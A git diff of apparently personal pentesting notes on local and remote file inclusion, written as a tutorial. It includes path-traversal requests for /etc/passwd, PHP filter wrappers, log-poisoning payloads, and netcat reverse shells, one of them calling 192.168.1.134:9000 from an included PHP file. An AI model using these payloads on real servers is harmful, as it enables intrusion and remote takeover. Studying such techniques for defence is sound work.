--- a/_posts/notes/web/2022-04-23-lfi.md
+++ b/_posts/notes/web/2022-04-23-lfi.md
@@ -1,8 +1,8 @@
 ---
 layout: post
-title: 'Notes | LFI'
+title: 'Notes | LFI & RFI'
 date: 2022-04-23
-permalink: /notes/web/lfi/
+permalink: /notes/web/lfi-rfi/
 ---
 
 # [](#header-4)Local file inclusion
@@ -24,7 +24,7 @@ We can check some important files:
 - **/proc/net/fib_trie ->** check network interfaces (with *grep -i  "host local" -B 1* we can get local ip).
 - **/proc/net/tcp ->** check port. The last four digits from the second column (rem_address), if we add a **0x** in Python before we can get the port (its common to not get ports like 80 here).
 
-## Directory Path Traversal
+### [](#header-4) Directory Path Traversal
 If the web is sanitaze with only one path allowed, we can move using **../**:
 {% highlight plain %}
 > curl -s "http://localhost/example.php?file=../../../../../../../etc/passwd"
@@ -32,18 +32,18 @@ If the web is sanitaze with only one path allowed, we can move using **../**:
 
 The web can set and extension to the end of the path, we can escape than with: **%00** at the end of the search.
 
-## Wrappers
+#### Wrappers
 Help to escape LFI sanitazer. For example:
 - **?file=file:///etc/passwd ->** get the file.
 - **?file=php:///filter/convert.base64-encode/resource=file.php ->** give all the content file (including comments) in base64 (useful to get the whole source code).
 
-## Log Poisoning
+### [](#header-4) Log Poisoning
 Change logs in order to recreate a RCE.
 
 #### Reverse Shell
 We can execute code accesing **/proc/self/environ**. We can modify the header in burpsuite to add:
 {% highlight plain %}
-<?passthru('nc -e /bin/bash <ip>:<port>');?>
+<?passthru('nc -e /bin/bash <ip> <port>');?>
 {% endhighlight %}
 To execute the reverse shell.
 
@@ -53,6 +53,9 @@ In **/var/log/apache2/access.log** we can manipulate the user agent that the log
 > curl -s -H "User-Agent: <¿php system('whoami'); ?>" "http://localhost/example.php?file=/var/log/apache2/access.log"
 {% endhighlight %}
 Now we can execute code in the system.
+
+Also, we can try to login (for example with ssh). **auth.log** will save the login attempt, if we execute the page after the login we will execute the script.
+##### Maybe we need to encode the payload to base64
 
 Another example is the **/var/log/auth.log**. We can try to log in by ssh with and invalid user and see that all the trys are been saving in the log.
 If we log as a command, execute the log (loading with curl or in the web with LFI) we can execute the command and get a **reverse shell**:
@@ -71,5 +74,18 @@ Then we will try to log in with any password. Now we just need to reload the log
 {% endhighlight %}
 
 
-## Remote File Inclusion (RFI)
+# [](#header-4)Remote File Inclusion (RFI)
 Load files into the server.
+
+We can create a plain file (**.txt**) with a php content:
+{% highlight plain %}
+<?php
+  passthru('nc -e /bin/sh 192.168.1.134 9000');
+?>
+{% endhighlight %}
+
+Then we change the url with:
+{% highlight plain %}
+...?index=http://<ip>/revershell.txt
+{% endhighlight %}
+And then we can execute code.
